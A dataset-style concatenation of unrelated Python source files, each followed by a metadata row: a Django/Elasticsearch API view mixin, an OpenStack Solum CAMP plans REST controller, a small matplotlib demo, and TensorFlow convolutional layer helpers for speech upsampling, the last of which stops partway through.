_current_page = None
_page_offset = None
_sort_argument = None
_export_argument = None
_exporter_map = None
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def get(self, *args, **kwargs):
"""
Handle the HTTP GET request to this APIView.
:param args: Positional arguments.
:param kwargs: Keyword arguments.
:return: A Django rest framework response object.
"""
if not self.has_export_argument:
to_return = super(BaseElasticsearchManyMappedAPIViewMixin, self).get(*args, **kwargs)
to_return.data["sortable_fields"] = self.sortable_fields
return to_return
else:
self.check_ws_permissions()
query_results = self._query_elasticsearch()
return self.exporter_map[self.export_argument].get_django_response_from_elasticsearch_response(query_results)
# Protected Methods
def _get_elasticsearch_query(self):
to_return = super(BaseElasticsearchManyMappedAPIViewMixin, self)._get_elasticsearch_query()
if self.has_export_argument:
self.__validate_export_value()
to_return.offset = 0
to_return.size = config.es_max_query_size
else:
to_return.offset = self.page_offset
to_return.size = self.page_size
if self.has_sort_argument:
self.__validate_sort_field()
to_return.add_sort_field(field_name=self.sort_field, direction=self.sort_direction)
return to_return
def _extract_contents_from_response(self, response):
results = self._extract_objects_from_response(response)
to_return = PaginationSerializer(
results=results,
count=response.results_count,
current_page=self.current_page,
)
return to_return.to_response_dict()
# Private Methods
def __get_current_page(self):
"""
Get an integer representing the current page if a page number was supplied in the request.
:return: An integer representing the current page if a page number was supplied in the request.
"""
page_number = self.request.query_params.get(settings.PAGINATION_PARAM, 1)
to_return = int(page_number) if ValidationHelper.is_int(page_number) else 1
return max(to_return, 1)
def __validate_export_value(self):
"""
Ensure that the value in self.export_argument is a valid string to export via.
:return: None
"""
ValidationHelper.validate_in(to_check=self.export_argument, contained_by=self.exporter_map_keys)
def __validate_sort_field(self):
"""
Ensure that the field in self.sort_field is a valid field to be sorted upon.
:return: None
"""
ValidationHelper.validate_in(to_check=self.sort_field, contained_by=self.sortable_fields)
# Properties
@property
def current_page(self):
"""
Get the current requested page number
:return: the current requested page number
"""
if self._current_page is None:
self._current_page = self.__get_current_page()
return self._current_page
@property
def export_argument(self):
"""
Get the export argument from the request's query string.
:return: the export argument from the request's query string.
"""
if self._export_argument is None:
self._export_argument = self.request.query_params.get(settings.EXPORT_PARAM, "")
return self._export_argument
@property
def exporter_map(self):
"""
Get a dictionary that maps export types to the classes that can handle exporting data to a file
of the given type.
:return: A dictionary that maps export types to the classes that can handle exporting data to a file
of the given type.
"""
if self._exporter_map is None:
self._exporter_map = get_export_type_wrapper_map()
return self._exporter_map
@property
def exporter_map_keys(self):
"""
Get a list of strings representing the valid export types supported by Web Sight.
:return: a list of strings representing the valid export types supported by Web Sight.
"""
return self.exporter_map.keys()
@property
def has_export_argument(self):
"""
Get whether or not the request has an export argument.
:return: whether or not the request has an export argument.
"""
return settings.EXPORT_PARAM in self.request.query_params
@property
def has_sort_argument(self):
"""
Get whether or not the request has a sorting argument.
:return: whether or not the request has a sorting argument.
"""
return api_settings.ORDERING_PARAM in self.request.query_params
@property
def page_offset(self):
"""
Get the page offset to use when querying Elasticsearch.
:return: the page offset to use when querying Elasticsearch.
"""
if self._page_offset is None:
self._page_offset = (self.current_page - 1) * self.page_size
return self._page_offset
@property
def page_size(self):
"""
Get the page size to use.
:return: the page size to use.
"""
return api_settings.PAGE_SIZE
@property
def sortable_fields(self):
"""
Get a list of the fields that this query allows sorting on.
:return: a list of the fields that this query allows sorting on.
"""
return self.queryable_model_fields
@property
def sort_argument(self):
"""
Get the sort argument from the request query string.
:return: the sort argument from the request query string.
"""
if self._sort_argument is None:
self._sort_argument = self.request.query_params.get(api_settings.ORDERING_PARAM, "")
return self._sort_argument
@property
def sort_direction(self):
"""
Get a string representing the direction that results should be ordered in.
:return: a string representing the direction that results should be ordered in.
"""
to_return = "desc" if self.sort_argument.startswith("-") else "asc"
print("SORT DIRECTION IS %s" % (to_return,))
return to_return
@property
def sort_field(self):
"""
Get the field to sort query results on.
:return: The field to sort query results on.
"""
return self.sort_argument[1:] if self.sort_argument.startswith("-") else self.sort_argument
# Representation and Comparison
class BaseElasticsearchRelatedAPIViewMixin(BaseElasticsearchManyMappedAPIViewMixin):
"""
This is a base Elasticsearch APIView mixin that allows users to query data based on multidoc queries
that span multiple document types.
"""
# Class Members
_filter_by_parent_db_object = False
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def _apply_filters_to_query(self, query):
query = super(BaseElasticsearchRelatedAPIViewMixin, self)._apply_filters_to_query(query)
filter_value = self._get_related_filter_value()
if filter_value is None:
raise ObjectDoesNotExist()
query.must_by_term(key=self.related_filter_key, value=filter_value)
return query
def _get_related_filter_value(self):
"""
Get the value that the Elasticsearch query should filter on to ensure results are related
to the relevant document.
:return: The value that the Elasticsearch query should filter on to ensure results are related
to the relevant document. If this method returns None, then a 404 will be raised.
"""
raise NotImplementedError("Subclasses must implement this!")
# Protected Methods
# Private Methods
# Properties
@property
def queryable_model_fields(self):
return self.es_query_class.get_queryable_fields()
@property
def related_filter_key(self):
"""
Get the key that the Elasticsearch query should be filtered on to ensure results are related to the
relevant document.
:return: the key that the Elasticsearch query should be filtered on to ensure results are related
to the relevant document.
"""
raise NotImplementedError("Subclasses must implement this!")
# Representation and Comparison
class BaseEsMixin(object):
"""
This is a base class for Elasticsearch mixin classes.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_es_query_class(cls):
"""
Get the Elasticsearch query class that this APIView is meant to query.
:return: The Elasticsearch query class that this APIView is meant to query.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
# Private Methods
# Properties
# Representation and Comparison
class BaseRelatedEsMixin(BaseEsMixin):
"""
This is a base class for Elasticsearch mixin classes that rely on multidoc queries.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_related_es_query_class(cls):
"""
Get the Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
:return: The Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
def _apply_related_elasticsearch_query_filters(self, query):
"""
Apply filters to the given query to restrict results to only those that match the Elasticsearch
document that is related to data returned by this APIView.
:param query: The query to apply filters to.
:return: The query with filters applied.
"""
query.must_by_term(key=self.mapped_elasticsearch_key, value=self.mapped_elasticsearch_value)
return query
def _get_related_filter_value(self):
"""
Get the value that the Elasticsearch query should filter on to ensure results are related
to the relevant document.
:return: The value that the Elasticsearch query should filter on to ensure results are related
to the relevant document. If this method returns None, then a 404 will be raised.
"""
query = self.related_elasticsearch_query_class()
query = self._apply_related_elasticsearch_query_filters(query)
query.queryable_model_fields = [self.parent_related_value_key]
result = query.search(self._get_elasticsearch_index())
if result.results_count == 0:
return None
if result.results_count > 0:
logger.warning(
"Too many results returned in APIView %s (%s returned)."
% (self.__class__.__name__, result.results_count)
)
return result.results[0]["_source"][self.parent_related_value_key]
# Private Methods
# Properties
@property
def parent_related_value_key(self):
"""
Get a string representing the key contained in the parent Elasticsearch document that the relationship
should be based upon.
:return: a string representing the key contained in the parent Elasticsearch document that the
relationship should be based upon.
"""
raise NotImplementedError("Subclasses must implement this!")
@property
def related_filter_key(self):
"""
Get the key that the Elasticsearch query should be filtered on to ensure results are related to the
relevant document.
:return: the key that the Elasticsearch query should be filtered on to ensure results are related
to the relevant document.
"""
raise NotImplementedError("Subclasses must implement this!")
@property
def related_elasticsearch_query_class(self):
"""
Get the Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
:return: The Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
"""
return self.__class__.get_related_es_query_class()
# Representation and Comparison
class BaseDbMixin(object):
"""
This is a base class for database mixin classes.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_db_model_class(cls):
"""
Get the database model class that this APIView is meant to query against.
:return: The database model class that this APIView is meant to query against.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
def _apply_filters_to_query(self, query):
query = super(BaseDbMixin, self)._apply_filters_to_query(query)
if self.filter_by_parent_db_object:
return self._apply_parent_db_object_filter(query)
else:
return query
def _apply_parent_db_object_filter(self, query):
"""
Apply a filter to the given Elasticsearch query that restricts results to only those objects
that are related to the parent database object.
:param query: The query to apply filters to.
:return: The query with filters applied.
"""
query.must_by_term(key=self.mapped_elasticsearch_key, value=self.mapped_elasticsearch_value)
return query
def _check_db_object_permissions(self):
"""
Check to see if the requesting user has sufficient permissions to be querying self.db_object.
:return: True if the requesting user has sufficient permissions to be querying self.db_object, False
otherwise.
"""
raise NotImplementedError("Subclasses must implement this!")
def _get_elasticsearch_index(self):
"""
Get the Elasticsearch index that the resulting Elasticsearch query should be restricted to.
:return: The Elasticsearch index that the resulting Elasticsearch query should be restricted to.
"""
raise NotImplementedError("Subclasses must implement this!")
# Private Methods
# Properties
@property
def mapped_elasticsearch_key(self):
"""
Get a string representing the key that the Elasticsearch query should be filtered by when filtering
upon a parent database object.
:return: a string representing the key that the Elasticsearch query should be filtered by when
filtering upon a parent database object.
"""
raise NotImplementedError("Subclasses must implement this!")
@property
def mapped_elasticsearch_value(self):
"""
Get a string representing the value that the Elasticsearch query should be filtered upon when filtering
upon a parent database object.
:return: a string representing the value that the Elasticsearch query should be filtered upon when
filtering upon a parent database object.
"""
return self.db_object.uuid
# Representation and Comparison
| gpl-3.0 | -154,340,441,295,558,980 | 32.977573 | 121 | 0.656494 | false | 4.547943 | false | false | false |
devdattakulkarni/test-solum | solum/api/controllers/camp/v1_1/plans.py | 1 | 9115 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import jsonpatch
from oslo_db import exception as db_exc
import pecan
from pecan import rest
import six
import wsme
from wsme.rest import json as wjson
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from solum.api.controllers.camp.v1_1.datamodel import plans as model
from solum.api.controllers.camp.v1_1 import uris
from solum.api.controllers import common_types
from solum.api.handlers.camp import plan_handler as plan_handler
from solum.common import exception
from solum.common import yamlutils
from solum.openstack.common.gettextutils import _
from solum.openstack.common import log as logging
LOG = logging.getLogger(__name__)
MAL_PATCH_ERR = 'JSON Patch request missing one or more required components'
UNSUP_VER_ERR = 'camp_version \'%s\' is not supported by this implementation'
def clean_plan(plan_dict):
del plan_dict['camp_version']
return plan_dict
def fluff_plan(plan_dict, pid):
"""Fluff the plan with a camp_version and uri."""
plan_dict['camp_version'] = "CAMP 1.1"
plan_dict['uri'] = uris.PLAN_URI_STR % (pecan.request.host_url,
pid)
return plan_dict
class JsonPatchProcessingException(exception.SolumException):
msg_fmt = _("Error while processing the JSON Patch document: %(reason)s")
code = 500
class PlansController(rest.RestController):
"""CAMP v1.1 plans controller."""
_custom_actions = {
'patch': ['PATCH']
}
@exception.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(None, wtypes.text, status_code=204)
def delete(self, uuid):
"""Delete this plan."""
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
try:
handler.delete(uuid)
except (db_exc.DBReferenceError, db_exc.DBError):
raise exception.PlanStillReferenced(name=uuid)
@exception.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(model.Plan, wtypes.text)
def get_one(self, uuid):
"""Return the appropriate CAMP-style plan resource."""
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
db_obj = handler.get(uuid)
plan_dict = fluff_plan(db_obj.refined_content(), db_obj.uuid)
return model.Plan(**plan_dict)
@exception.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(model.Plans)
def get(self):
puri = uris.PLANS_URI_STR % pecan.request.host_url
pdef_uri = uris.DEPLOY_PARAMS_URI % pecan.request.host_url
desc = "Solum CAMP API plans collection resource."
handler = plan_handler.PlanHandler(pecan.request.security_context)
plan_objs = handler.get_all()
p_links = []
for m in plan_objs:
p_links.append(common_types.Link(href=uris.PLAN_URI_STR %
(pecan.request.host_url, m.uuid),
target_name=m.name))
# if there aren't any plans, avoid returning a resource with an
# empty plan_links array
if len(p_links) > 0:
res = model.Plans(uri=puri,
name='Solum_CAMP_plans',
type='plans',
description=desc,
parameter_definitions_uri=pdef_uri,
plan_links=p_links)
else:
res = model.Plans(uri=puri,
name='Solum_CAMP_plans',
type='plans',
description=desc,
parameter_definitions_uri=pdef_uri)
return res
@exception.wrap_pecan_controller_exception
@pecan.expose('json', content_type='application/json-patch+json')
def patch(self, uuid):
"""Patch an existing CAMP-style plan."""
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
plan_obj = handler.get(uuid)
# TODO([email protected]) check if there are any assemblies that
# refer to this plan and raise an PlanStillReferenced exception if
# there are.
if not pecan.request.body or len(pecan.request.body) < 1:
raise exception.BadRequest(reason='empty request body')
# check to make sure the request has the right Content-Type
if (pecan.request.content_type is None or
pecan.request.content_type != 'application/json-patch+json'):
raise exception.UnsupportedMediaType(
name=pecan.request.content_type,
method='PATCH')
try:
patch = jsonpatch.JsonPatch.from_string(pecan.request.body)
patched_obj = patch.apply(plan_obj.refined_content())
db_obj = handler.update(uuid, patched_obj)
except KeyError:
# a key error indicates one of the patch operations is missing a
# component
raise exception.BadRequest(reason=MAL_PATCH_ERR)
except jsonpatch.JsonPatchConflict:
raise exception.Unprocessable
except jsonpatch.JsonPatchException as jpe:
raise JsonPatchProcessingException(reason=six.text_type(jpe))
return fluff_plan(db_obj.refined_content(), db_obj.uuid)
@exception.wrap_pecan_controller_exception
@pecan.expose('json', content_type='application/x-yaml')
def post(self):
"""Create a new CAMP-style plan."""
if not pecan.request.body or len(pecan.request.body) < 1:
raise exception.BadRequest
# check to make sure the request has the right Content-Type
if (pecan.request.content_type is None or
pecan.request.content_type != 'application/x-yaml'):
raise exception.UnsupportedMediaType(
name=pecan.request.content_type,
method='POST')
try:
yaml_input_plan = yamlutils.load(pecan.request.body)
except ValueError as excp:
raise exception.BadRequest(reason='Plan is invalid. '
+ six.text_type(excp))
camp_version = yaml_input_plan.get('camp_version')
if camp_version is None:
raise exception.BadRequest(
reason='camp_version attribute is missing from submitted Plan')
elif camp_version != 'CAMP 1.1':
raise exception.BadRequest(reason=UNSUP_VER_ERR % camp_version)
# Use Solum's handler as the point of commonality. We can do this
# because Solum stores plans in the DB in their JSON form.
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
model_plan = model.Plan(**yaml_input_plan)
# Move any inline Service Specifications to the "services" section.
# This avoids an issue where WSME can't properly handle multi-typed
# attributes (e.g. 'fulfillment'). It also smoothes out the primary
# difference between CAMP plans and Solum plans, namely that Solum
# plans don't have inline Service Specifications.
for art in model_plan.artifacts:
if art.requirements != wsme.Unset:
for req in art.requirements:
if (req.fulfillment != wsme.Unset and
isinstance(req.fulfillment,
model.ServiceSpecification)):
s_spec = req.fulfillment
# if the inline service spec doesn't have an id
# generate one
if s_spec.id == wsme.Unset:
s_spec.id = str(uuid.uuid4())
# move the inline service spec to the 'services'
# section
if model_plan.services == wsme.Unset:
model_plan.services = [s_spec]
else:
model_plan.services.append(s_spec)
# set the fulfillment to the service spec id
req.fulfillment = "id:%s" % s_spec.id
db_obj = handler.create(clean_plan(wjson.tojson(model.Plan,
model_plan)))
plan_dict = fluff_plan(db_obj.refined_content(), db_obj.uuid)
pecan.response.status = 201
pecan.response.location = plan_dict['uri']
return plan_dict
| apache-2.0 | 5,306,191,214,696,418,000 | 39.154185 | 79 | 0.602414 | false | 4.052912 | false | false | false |
BTY2684/gitPy-snippets | testProj/main.py | 1 | 1348 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# main.py
#
# Copyright 2014 Yang <yang@Leo-FamilyGuy>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import d3py
import pandas
import numpy as np
import matplotlib.pyplot as plt
import classes as TSs
def main():
obj1 = TSs.Bond()
obj2 = TSs.Stock()
for i in range(10):
obj1.data_add(obj1._datasize, i + 1)
obj2.data_add(obj2._datasize, i - 10)
print (obj1._datadict)
print (obj2._datadict)
plt.bar(obj1._datadict.values(), obj2._datadict.values(), align='center')
plt.xticks(range(len(obj1._datadict)), obj1._datadict.keys())
plt.show()
return 0
if __name__ == '__main__':
main()
| gpl-2.0 | -295,398,262,035,383,740 | 25.431373 | 74 | 0.699555 | false | 3.156909 | false | false | false |
jhetherly/EnglishSpeechUpsampler | models.py | 1 | 20377 | import tensorflow as tf
custom_shuffle_module = tf.load_op_library('src/shuffle_op.so')
shuffle = custom_shuffle_module.shuffle
# ###################
# TENSORBOARD HELPERS
# ###################
def comprehensive_variable_summaries(var):
"""
Attach a lot of summaries to a Tensor (for TensorBoard visualization).
"""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def histogram_variable_summaries(var):
"""
Attach a histogram summary to a Tensor (for TensorBoard visualization).
"""
with tf.name_scope('summaries'):
tf.summary.histogram('histogram', var)
# ###################
# ###################
# ######################
# LAYER HELPER FUNCTIONS
# ######################
def subpixel_reshuffle_1D_impl(X, m):
"""
performs a 1-D subpixel reshuffle of the input 2-D tensor
assumes the last dimension of X is the filter dimension
ref: https://github.com/Tetrachrome/subpixel
"""
return tf.transpose(tf.stack([tf.reshape(x, (-1,)) for x
in tf.split(X, m, axis=1)]))
def subpixel_reshuffle_1D(X, m, name=None):
"""
maps over the batch dimension
"""
return tf.map_fn(lambda x: subpixel_reshuffle_1D_impl(x, m), X, name=name)
def subpixel_restack_impl(X, n_prime, m_prime, name=None):
"""
performs a subpixel restacking such that it restacks columns of a 2-D
tensor onto the rows
"""
bsize = tf.shape(X)[0]
r_n = n_prime - X.get_shape().as_list()[1]
total_new_space = r_n*m_prime
to_stack = tf.slice(X, [0, 0, m_prime], [-1, -1, -1])
to_stack = tf.slice(tf.reshape(to_stack, (bsize, -1)),
[0, 0], [-1, total_new_space])
to_stack = tf.reshape(to_stack, (bsize, -1, m_prime))
to_stack = tf.slice(to_stack, [0, 0, 0], [-1, r_n, -1])
return tf.concat((tf.slice(X, [0, 0, 0], [-1, -1, m_prime]), to_stack),
axis=1, name=name)
def subpixel_restack(X, n_prime, m_prime=None, name=None):
n = X.get_shape().as_list()[1]
m = X.get_shape().as_list()[2]
r_n = n_prime - n
if m_prime is None:
for i in range(1, m):
r_m = i
m_prime = m - r_m
if r_m*n >= m_prime*r_n:
break
return subpixel_restack_impl(X, n_prime, m_prime, name=name)
def batch_norm(T, is_training, scope):
# tf.cond takes nullary functions as its first and second arguments
return tf.cond(is_training,
lambda: tf.contrib.layers.batch_norm(T,
decay=0.99,
# zero_debias_moving_mean=True,
is_training=is_training,
center=True, scale=True,
updates_collections=None,
scope=scope,
reuse=False),
lambda: tf.contrib.layers.batch_norm(T,
decay=0.99,
is_training=is_training,
center=True, scale=True,
updates_collections=None,
scope=scope,
reuse=True))
def weight_variable(shape, name=None):
initial = tf.truncated_normal(shape, mean=0.0, stddev=0.1)
return tf.Variable(initial, name=name)
def bias_variable(shape, name=None):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
def conv1d(x, W, stride=1, padding='SAME', name=None):
return tf.nn.conv1d(x, W, stride=stride, padding=padding, name=name)
def build_1d_conv_layer(prev_tensor, prev_conv_depth,
conv_window, conv_depth,
act, layer_number,
stride=1,
padding='SAME',
tensorboard_output=False,
name=None):
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([conv_window,
prev_conv_depth,
conv_depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([conv_depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
conv = conv1d(prev_tensor, W, stride=stride, padding=padding) + b
if tensorboard_output:
histogram_variable_summaries(conv)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
h = act(conv, name=name)
if tensorboard_output:
histogram_variable_summaries(h)
return h
def build_1d_conv_layer_with_res(prev_tensor, prev_conv_depth,
conv_window, conv_depth,
res, act, layer_number,
tensorboard_output=False,
name=None):
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([conv_window,
prev_conv_depth,
conv_depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([conv_depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
conv = conv1d(prev_tensor, W) + b
if tensorboard_output:
histogram_variable_summaries(conv)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
h = act(tf.add(conv, res), name=name)
if tensorboard_output:
histogram_variable_summaries(h)
return h
def build_downsampling_block(input_tensor,
filter_size, stride,
layer_number,
act=tf.nn.relu,
is_training=True,
depth=None,
padding='VALID',
tensorboard_output=False,
name=None):
# assume this layer is twice the depth of the previous layer if no depth
# information is given
if depth is None:
depth = 2*input_tensor.get_shape().as_list()[-1]
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([filter_size,
input_tensor.get_shape().as_list()[-1],
depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
l = tf.nn.conv1d(input_tensor, W, stride=stride,
padding=padding, name=name) + b
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_batch_norm'.format(layer_number)) as scope:
# l = tf.nn.dropout(l, keep_prob=0.25)
l = batch_norm(l, is_training, scope)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
l = act(l, name=name)
if tensorboard_output:
histogram_variable_summaries(l)
return l
def build_upsampling_block(input_tensor, residual_tensor,
filter_size,
layer_number,
act=tf.nn.relu,
is_training=True,
depth=None,
padding='VALID',
tensorboard_output=False,
name=None):
# assume this layer is half the depth of the previous layer if no depth
# information is given
if depth is None:
depth = int(input_tensor.get_shape().as_list()[-1]/2)
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([filter_size,
input_tensor.get_shape().as_list()[-1],
depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
l = tf.nn.conv1d(input_tensor, W, stride=1,
padding=padding, name=name) + b
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_batch_norm'.format(layer_number)) as scope:
# l = tf.nn.dropout(l, keep_prob=0.25)
l = batch_norm(l, is_training, scope)
# l = tf.nn.l2_normalize(l, dim=2)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
l = act(l, name=name)
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_subpixel_reshuffle'.format(layer_number)):
l = subpixel_reshuffle_1D(l,
residual_tensor.get_shape().as_list()[-1],
name=name)
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_stacking'.format(layer_number)):
sliced = tf.slice(residual_tensor,
begin=[0, 0, 0],
size=[-1, l.get_shape().as_list()[1], -1])
l = tf.concat((l, sliced), axis=2, name=name)
if tensorboard_output:
histogram_variable_summaries(l)
return l
# ######################
# ######################
# #################
# MODEL DEFINITIONS
# #################
def single_fully_connected_model(input_type, input_shape,
n_inputs, n_weights,
tensorboard_output=True,
scope_name='single_fully_connected_layer'):
with tf.name_scope(scope_name):
# input of the model (examples)
s = [None]
shape_prod = 1
for i in input_shape:
s.append(i)
shape_prod *= i
x = tf.placeholder(input_type, shape=s)
x_ = tf.reshape(x, [-1, shape_prod])
# first conv layer
with tf.name_scope('first_layer_weights'):
s = []
s.append(shape_prod)
s.append(n_weights)
W = weight_variable(s)
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('first_layer_biases'):
b = bias_variable([n_weights])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('first_layer_preactivation'):
preact = tf.matmul(x_, W) + b
if tensorboard_output:
histogram_variable_summaries(preact)
with tf.name_scope('first_layer_activation'):
y = tf.identity(preact, name=scope_name)
if tensorboard_output:
histogram_variable_summaries(y)
return x, y
def three_layer_conv_model(input_type, input_shape,
first_conv_window=30, first_conv_depth=128,
second_conv_window=10, second_conv_depth=64,
third_conv_window=15,
tensorboard_output=False,
scope_name='3-layer_conv'):
with tf.name_scope(scope_name):
# input of the model (examples)
s = [None]
for i in input_shape:
s.append(i)
x = tf.placeholder(input_type, shape=s)
# first conv layer
h1 = build_1d_conv_layer(x, 1,
first_conv_window, first_conv_depth,
tf.nn.elu, 1,
tensorboard_output)
# second conv layer
h2 = build_1d_conv_layer(h1, first_conv_depth,
second_conv_window, second_conv_depth,
tf.nn.elu, 2,
tensorboard_output)
# third (last) conv layer
y = build_1d_conv_layer(h2, second_conv_depth,
third_conv_window, 1,
tf.identity, 3,
tensorboard_output,
scope_name)
return x, y
def five_layer_conv_model(input_type, input_shape,
first_conv_window=30, first_conv_depth=256,
second_conv_window=20, second_conv_depth=128,
third_conv_window=10, third_conv_depth=64,
fourth_conv_window=5, fourth_conv_depth=32,
fifth_conv_window=5,
tensorboard_output=False,
scope_name='5-layer_conv'):
with tf.name_scope(scope_name):
# input of the model (examples)
s = [None]
for i in input_shape:
s.append(i)
x = tf.placeholder(input_type, shape=s)
# first conv layer
h1 = build_1d_conv_layer(x, 1,
first_conv_window, first_conv_depth,
tf.nn.elu, 1,
tensorboard_output)
# second conv layer
h2 = build_1d_conv_layer(h1, first_conv_depth,
second_conv_window, second_conv_depth,
tf.nn.elu, 2,
tensorboard_output)
# third conv layer
h3 = build_1d_conv_layer(h2, second_conv_depth,
third_conv_window, third_conv_depth,
tf.nn.elu, 3,
tensorboard_output)
# fourth conv layer
h4 = build_1d_conv_layer(h3, third_conv_depth,
fourth_conv_window, fourth_conv_depth,
tf.nn.elu, 4,
tensorboard_output)
# fifth (last) conv layer
y = build_1d_conv_layer(h4, fourth_conv_depth,
fifth_conv_window, 1,
tf.identity, 5,
tensorboard_output,
scope_name)
return x, y
def deep_residual_network(input_type, input_shape,
number_of_downsample_layers=8,
channel_multiple=8,
initial_filter_window=5,
initial_stride=2,
downsample_filter_window=3,
downsample_stride=2,
bottleneck_filter_window=4,
bottleneck_stride=2,
upsample_filter_window=3,
tensorboard_output=False,
scope_name='deep_residual'):
print('layer summary for {} network'.format(scope_name))
downsample_layers = []
upsample_layers = []
with tf.name_scope(scope_name):
# training flag
train_flag = tf.placeholder(tf.bool)
# input of the model (examples)
s = [None]
for i in input_shape:
s.append(i)
x = tf.placeholder(input_type, shape=s)
input_size = s[-2]
num_of_channels = s[-1]
print('input: {}'.format(x.get_shape().as_list()[1:]))
d1 = build_downsampling_block(x,
filter_size=initial_filter_window,
stride=initial_stride,
tensorboard_output=tensorboard_output,
depth=channel_multiple*num_of_channels,
is_training=train_flag,
layer_number=1)
print('downsample layer: {}'.format(d1.get_shape().as_list()[1:]))
downsample_layers.append(d1)
layer_count = 2
for i in range(number_of_downsample_layers - 1):
d = build_downsampling_block(
downsample_layers[-1],
filter_size=downsample_filter_window,
stride=downsample_stride,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('downsample layer: {}'.format(d.get_shape().as_list()[1:]))
downsample_layers.append(d)
layer_count += 1
bn = build_downsampling_block(downsample_layers[-1],
filter_size=bottleneck_filter_window,
stride=bottleneck_stride,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('bottleneck layer: {}'.format(bn.get_shape().as_list()[1:]))
layer_count += 1
u1 = build_upsampling_block(bn, downsample_layers[-1],
depth=bn.get_shape().as_list()[-1],
filter_size=upsample_filter_window,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('upsample layer: {}'.format(u1.get_shape().as_list()[1:]))
upsample_layers.append(u1)
layer_count += 1
for i in range(number_of_downsample_layers - 2, -1, -1):
u = build_upsampling_block(upsample_layers[-1],
downsample_layers[i],
filter_size=upsample_filter_window,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('upsample layer: {}'.format(u.get_shape().as_list()[1:]))
upsample_layers.append(u)
layer_count += 1
target_size = int(input_size/initial_stride)
restack = subpixel_restack(upsample_layers[-1],
target_size + (upsample_filter_window - 1))
print('restack layer: {}'.format(restack.get_shape().as_list()[1:]))
conv = build_1d_conv_layer(restack, restack.get_shape().as_list()[-1],
upsample_filter_window, initial_stride,
tf.nn.elu, layer_count,
padding='VALID',
tensorboard_output=tensorboard_output)
print('final conv layer: {}'.format(conv.get_shape().as_list()[1:]))
# NOTE this effectively is a linear activation on the last conv layer
